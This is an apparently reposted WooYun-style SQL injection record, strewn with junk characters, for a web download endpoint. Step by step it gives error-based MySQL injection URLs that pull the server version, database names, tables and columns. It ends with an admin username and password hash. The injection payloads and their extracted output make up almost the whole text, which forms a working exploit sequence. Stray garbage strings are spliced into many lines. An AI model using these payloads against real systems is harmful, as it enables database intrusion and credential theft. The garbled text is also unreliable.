http://www.wooyun.org/bugs/wooyun-2010-01666
& }/ G; K5 p ^4 I/ i2 C) R6 f# |8 @% r$ j7 q3 X" u# [
之前想找个测试 没想到这有 可以测试下做个记录而已
# E6 [! p; m% K& S3 U; j/ n8 x& m
; h- n6 ?* M0 hhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003; ~/ [! u6 n; k! q6 p
$ o6 q; h: M& V$ X, h1 b0 S# b/data0/htdocs/leqi_new/app/myapp.php
/ j$ `' ?( p8 T1 m) W
9 M$ X# c2 w ], }8 y2 b. I- k z 或者
1 i* r& `# j# z. M6 e( k# P. o( C; L$ Z3 U
/**********version()**********/ 5.1.49-log
+ n6 }3 A. ?- _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. f% q; t7 S& V0 ], B0 Y. h, q! R* ?' V; E: s7 S0 m, E4 o# \( j
/**********user()**********/ + y- ?$ c5 l, R6 ~# ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& [" @7 b1 r1 W5 L" B6 y7 o' s& y0 ?8 U
/**********database()**********/ leqi
% [# |9 |. _" r2 `) |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 G$ W5 Y3 P' b$ b
! f% O! D9 ~' P& i1 e- x
/**********limit依次递归爆库**********/
! c' j2 S h T: Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" a( z3 s0 Y4 I E
information_schema
5 f1 F4 V f$ xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. E% f3 v* `' ]% {% wleqi
' X+ `% M) Z' Y* ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. u9 j9 f( @- d
test6 g2 n) d7 t( r$ b
8 c) U$ X" z- ~/**********limit依次递归爆表名**********/
T- ?, H+ a0 M, [5 W9 ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 @8 ]4 e7 i h% `: r; ^users+ S, w v; r" }- _2 ]- _' O+ H5 s
8 @. y" ^, k# [& i
/**********limit依次递归爆字段名**********/ q1 I) ` D9 `: n' D3 u
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; O( _+ r. l+ d! a( u
user_id,username,nickname,passwd,group_id9 K! B% j9 E( b8 p' M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23( r0 K1 ?7 z8 \7 a8 w" V$ J' o
/wapc/5000_0005_003
6 s8 {0 _/ q9 `11 21
4 x& S1 G6 W3 a& E: D# ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- |6 P6 _; ^$ m3 z6 G4 y4 {/wapc/5000_0005_003$ D% ?/ j8 F6 P) j3 \% n6 i2 P
11 341 351 361. x' e' o' ^4 T1 h! o" k! X
/**********爆数据**********/
) ^* `+ s& q' @; B, @& g3 l& @1 khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, z% v: a# ]' x. ladmin& _" U: T4 O% Z: C- R, g2 P5 u
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. d' \3 {; y/ x; v6a8b4574ca231eb8bd52764d4978ffcd
0 a6 a/ q9 Y4 i7 ]# c9 F
) Y1 v( R' Q% o. e
A4 E0 t e9 t7 _- u |